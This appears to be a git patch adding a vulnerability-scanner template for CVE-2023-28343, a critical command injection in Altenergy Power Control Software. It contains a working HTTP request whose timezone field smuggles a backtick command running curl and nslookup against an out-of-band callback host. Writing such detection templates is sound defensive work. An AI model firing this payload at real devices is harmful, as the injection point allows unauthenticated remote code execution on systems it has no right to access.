From 9ec0d967c8f5e0129ee5c1312512ac4c211fbd2d Mon Sep 17 00:00:00 2001
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com>
Date: Wed, 22 Mar 2023 23:32:10 +0700
Subject: [PATCH] Create CVE-2023-28343

---
 cves/2023/CVE-2023-28343 | 35 +++++++++++++++++++++++++++++++++++
 1 file changed, 35 insertions(+)
 create mode 100644 cves/2023/CVE-2023-28343

diff --git a/cves/2023/CVE-2023-28343 b/cves/2023/CVE-2023-28343
new file mode 100644
index 0000000000..33003c9895
--- /dev/null
+++ b/cves/2023/CVE-2023-28343
@@ -0,0 +1,35 @@
+id: CVE-2023-28343
+
+info:
+  name: Altenergy Power Control Software Command-Injection
+  author: pikpikcu
+  severity: critical
+  description: |
+    OS command injection affects Altenergy Power Control Software C1.2.5 via shell metacharacters in the index.php/management/set_timezone timezone parameter, because of set_timezone in models/management_model.php.
+  reference:
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28343
+    - https://github.com/ahmedalroky/Disclosures/blob/main/apesystems/os_command_injection.md
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-28343
+    cwe-id: CWE-78
+  tags: cve,cve2023,rce,altenergy
+
+requests:
+  - raw:
+      - |
+        POST /index.php/management/set_timezone HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        X-Requested-With: XMLHttpRequest
+        Accept-Encoding: gzip, deflate
+        Referer: {{Hostname}}/index.php/management/datetime
+        timezone=`curl {{interactsh-url}} | nslookup {{interactsh-url}}`
+ 
+    matchers:
+      - type: word
+        part: interactsh_protocol  # Confirms the DNS Interaction
+        words:
+          - "dns"
+          - "http"